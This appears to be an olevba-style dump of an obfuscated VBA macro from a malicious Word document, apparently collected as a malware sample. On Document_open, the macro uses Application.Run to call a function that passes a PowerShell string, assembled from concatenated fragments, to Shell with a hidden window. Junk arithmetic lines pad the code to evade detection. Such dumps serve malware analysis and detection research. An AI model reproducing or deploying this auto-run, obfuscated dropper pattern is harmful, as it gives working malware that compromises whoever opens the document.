Filename     : ./macros/dda254523e025c91d624920c0c4b4cf9adfa649cc64ac4acd2f2e028d3a5d083
OLE stream   : Macros/VBA/jzHOHjGziq
VBA filename : jzHOHjGziq.cls
----------------------------------------
Attribute VB_Name = "jzHOHjGziq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function GiMcdbwJ()
On Error Resume Next
ZBEBF = FfEGSW
aVDLZW = 26420 + 18353
wzwwBH = lHVGF * CSng(90381 * Fix(36322)) * wnUsT + CSng(nPCYf + CLng(jmZEOb)) / (pYmCXG * CSng(66620) - (11740 + Fix(obWfCq) - (28073 + CLng(CVqiLh - Log(YWUqzh) - 33061 + Int(iPdoJk)))))
lsGwW = 69945 / 86061
lkwGba = Atn(zkqXn + Sin(tlAiq) - 86461 / 57615)
BpYdQ = MzNwit
kzbuP = 95494 + 86851
wzQGw = ssIEqI * CSng(69821 * Fix(20923)) * TmwKfU + CSng(kZHiA + CLng(fEHmzA)) / (DouIjN * CSng(76174) - (93203 + Fix(cNlaK) - (16136 + CLng(SnOuZ - Log(qzRzz) - 24525 + Int(wDJkk)))))
urkOas = 11056 / 48041
iroaRh = Atn(izttai + Sin(wpzlF) - 1304 / 81457)
NGZwO = Bpzna
YYQpH = 12629 + 8424
ikvhz = qCGkcY * CSng(79357 * Fix(83005)) * KtjLmo + CSng(ELDoTM + CLng(lkzUjX)) / (dvShW * CSng(89365) - (13058 + Fix(CVQhm) - (13003 + CLng(buRjlf - Log(dIddEV) - 99847 + Int(DITjjz)))))
EsplL = 47852 / 33337
iQtls = Atn(iYlZr + Sin(IECzmZ) - 87034 / 34749)
zbPRTO = dhHptP
krENjq = 48034 + 1890
hGnfC = XEAjkR * CSng(31329 * Fix(46633)) * RquoB + CSng(mmSXa + CLng(ocEUz)) / (wjzmT * CSng(23212) - (80779 + Fix(lzGqdT) - (36968 + CLng(wqwkzD - Log(UVIbNj) - 54264 + Int(LkBTrU)))))
kcvID = 91357 / 11847
XiwWWn = Atn(btGtEf + Sin(YPQsl) - 58417 / 33099)
GiMcdbwJ = TojBaicP + Chr$(CBNukDQTz + 80 + FuPONv) + "OwerSH" + zrqEm + wHfNAcj + zACzIFvYvm + miTYzwJS + MHHijhQQmj
mYfEcZ = ihLYYT
Uiwhm = 41013 + 70492
GqNMwV = NjjVRG * CSng(34860 * Fix(77276)) * uKcnL + CSng(oYvPHQ + CLng(WIkrY)) / (ZEGPQ * CSng(2793) - (38088 + Fix(GXwOC) - (82077 + CLng(mctzQd - Log(pRjOL) - 2478 + Int(bkZiz)))))
OpjCq = 35617 / 22555
JnuLl = Atn(EiAzBF + Sin(dkfru) - 16370 / 82421)
EQzEdv = UwcFC
TiIlYc = 90631 + 86986
ZGpuwN = vYsCO * CSng(47410 * Fix(40861)) * zDlzK + CSng(jRFZWw + CLng(Eujktu)) / (zmiAU * CSng(48634) - (30194 + Fix(fQauMH) - (77713 + CLng(qzjvp - Log(kVbOOr) - 58699 + Int(SViPD)))))
JYGLY = 40690 / 42572
ZlckT = Atn(lozbmm + Sin(ZsmJw) - 30712 / 17032)
End Function
Function AkNXjUhW(KWNwIwJV)
On Error Resume Next
ZOzVXa = uNUVVB
VAcbbE = 33892 + 61751
fzuIP = WZuPP * CSng(83167 * Fix(89568)) * oimim + CSng(LWKFF + CLng(YdjzQE)) / (tkwKU * CSng(60472) - (85487 + Fix(YhqnEb) - (78747 + CLng(toZiOA - Log(poCbo) - 86197 + Int(zwLZBa)))))
DEFjj = 85075 / 53564
YRzuTm = Atn(TSBMjq + Sin(IqZDta) - 17258 / 41875)
DiQHc = crFAjH
ECzpH = 72036 + 43152
zhCzv = ODFbqW * CSng(74801 * Fix(41044)) * VlQpJf + CSng(nAQoz + CLng(jukqI)) / (OPTYi * CSng(88267) - (60274 + Fix(Puiic) - (67810 + CLng(iErvN - Log(tuCiHq) - 23776 + Int(KqAOU)))))
VQqWD = 36505 / 81871
dCMlv = Atn(VrtVlL + Sin(sFqtu) - 90816 / 80469)
inDcEa = GwirBJS + Shell(fYHttFAAJ + KWNwIwJV + uBziQFbCN, 65045 - 65045)
KcWEP = VzrKYT
Ajwva = 38380 + 28165
zFSil = lWOsK * CSng(58823 * Fix(75545)) * rVEnLc + CSng(ouLiTU + CLng(tbczbj)) / (YzcrZ * CSng(82578) - (39981 + Fix(HYcOLp) - (52656 + CLng(mIlVIL - Log(wRnBd) - 75917 + Int(LCDjS)))))
jalprC = 84347 / 23924
bwmmi = Atn(nnGFJu + Sin(kqqqO) - 95728 / 24924)
End Function
Private Sub Document_open()
On Error Resume Next
sHcHjs = iwaFc
LiGKDZ = 40827 + 23858
lFjvWA = mvvbju * CSng(63111 * Fix(45319)) * VAUqX + CSng(oXqOHj + CLng(zSrNVq)) / (YTTUD * CSng(8858) - (30122 + Fix(sJQzjw) - (65333 + CLng(AVRwR - Log(FHtNF) - 91101 + Int(jSYpGp)))))
MbqwU = 1085 / 15755
jAnSX = Atn(fjzJz + Sin(RtqrEs) - 99729 / 30347)
zHXpo = zHmuol
KjNVd = 67862 + 86630
UzGZnT = zTDKX * CSng(81150 * Fix(10236)) * XclAq + CSng(FRump + CLng(rcdqR)) / (PXKWh * CSng(85944) - (48159 + Fix(liXuFi) - (9372 + CLng(qtsiCS - Log(fMnzR) - 63842 + Int(qMtIa)))))
JuuHuR = 77200 / 22029
sBvsbP = Atn(atzhH + Sin(KmjwiM) - 94335 / 17242)
Application.Run hiuYj + "AkNXjUhW" + HziEI, ujhmmP + GiMcdbwJ + DdmurJZ
ImUTI = fQzNOl
FqUWh = 13384 + 26680
vdYNr = zUVFm * CSng(66071 * Fix(95617)) * AZVwmz + CSng(ZCUsvo + CLng(mXkhz)) / (Bdwbww * CSng(2545) - (75869 + Fix(oBDPV) - (81685 + CLng(BiUOkV - Log(DUvMth) - 95965 + Int(FkHiW)))))
BjHFT = 36873 / 93482
tBpznI = Atn(SpjTN + Sin(VBMiFj) - 3850 / 90347)
ZQrjX = DrApM
PtfqcU = 86314 + 3533
CUfmA = qhouW * CSng(43804 * Fix(46232)) * tXNThS + CSng(SnJcl + CLng(bPrwDQ)) / (kznWh * CSng(48546) - (50951 + Fix(YTOIr) - (24409 + CLng(SOALjt - Log(jWJOPO) - 35143 + Int(vSFRvu)))))
TJMzc = 46666 / 92945
rlHrst = Atn(vTtdp + Sin(cwshMB) - 36699 / 34540)
End Sub

